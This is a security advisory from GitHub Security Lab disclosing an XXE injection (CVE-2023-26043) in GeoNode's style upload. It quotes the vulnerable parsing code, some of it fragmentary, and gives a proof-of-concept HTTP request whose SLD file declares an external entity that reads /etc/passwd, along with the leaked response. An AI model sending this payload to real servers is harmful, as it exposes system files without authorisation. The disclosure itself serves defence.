March 23, 2023

GHSL-2022-129: XML External Entity (XXE) injection in GeoNode - CVE-2023-26043

Jorge Rosillo

GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read.



Tested Version



Issue: XML External Entity (XXE) injection in GeoServer style upload functionality (GHSL-2022-129)

GeoNode’s GeoServer has the ability to upload new styles for datasets through the dataset_style_upload view.

def dataset_style_upload(request, layername):
    def respond(*args, **kw):
        kw['content_type'] = 'text/html'
        return json_response(*args, **kw)


    sld = request.FILES['sld'].read() # 1
    sld_name = None
        # Check SLD is valid


        sld_name = extract_name_from_sld(gs_catalog, sld, sld_file=request.FILES['sld']) # 2
    except Exception as e:
        respond(errors=f"The uploaded SLD file is not valid XML: {e}")

    name = data.get('name') or sld_name

    set_dataset_style(layer, data.get('title') or name, sld)

    return respond(
            'success': True,
            'style': data.get('title') or name, # 3
            'updated': data['update']})

dataset_style_upload gets a user-provided file (1), pass it to extract_name_from_sld to extract an element from it (2) and return the former in the response (3).

def extract_name_from_sld(gs_catalog, sld, sld_file=None):
        if sld:
            if isfile(sld):
                with open(sld, "rb") as sld_file:
                    sld = # 1
            if isinstance(sld, str):
                sld = sld.encode('utf-8')
            dom = etree.XML(sld) # 2

    named_dataset = dom.findall(

    el = None
    if named_dataset and len(named_dataset) > 0:
        user_style = named_dataset[0].findall("{}UserStyle")
        if user_style and len(user_style) > 0:
            el = user_style[0].findall("{}Name") # 3

    return el[0].text # 4

extract_name_from_sld uses sld (which is a path to the provided file), reads it (1) and parses it with etree.XML in 2. Since the former uses a default XMLParser, the parsing gets done with the resolve_entities flag set to True. Therefore, dom handles the parsed XML containing the resolved entity (2), gets NamedLayer.UserStyle.Name in 3 and returns the resolved content in 4.

This issue was found with CodeQL using python’s XML External Entity injection query.

Proof of Concept

  1. Create a guest/non-privileged account and log in.
  2. Upload a dataset through /catalogue/#/upload/dataset whose name we will be referencing as <DATASET_NAME>.
  3. Send the following request that will try to upload a new style for the dataset. The response will be returning the resolved entity with the contents of /etc/passwd:
POST /gs/geonode:<DATASET_NAME>/style/upload HTTP/1.1
Host: localhost
Cookie: django_language=en-us; csrftoken=<CSRF-TOKEN>; sessionid=<SESSION-COOKIE>
X-Csrftoken: <CSRF-TOKEN>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoo
Content-Length: 485

Content-Disposition: form-data; name="layerid"

Content-Disposition: form-data; name="sld"; filename="foo.sld"
Content-Type: application/octet-stream

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY ent SYSTEM "/etc/passwd" > ]>
<foo xmlns="">

Sample response:

HTTP/1.1 200 OK
Server: nginx/1.23.2

{"success": true, "style": "root:x:0:0:root:/root:/bin/bash...", "updated": false}


This issue may lead to Arbitrary File Read.




This issue was discovered and reported by GHSL team member @jorgectf (Jorge Rosillo).


You can contact the GHSL team at, please include a reference to GHSL-2022-129 in any communication regarding this issue.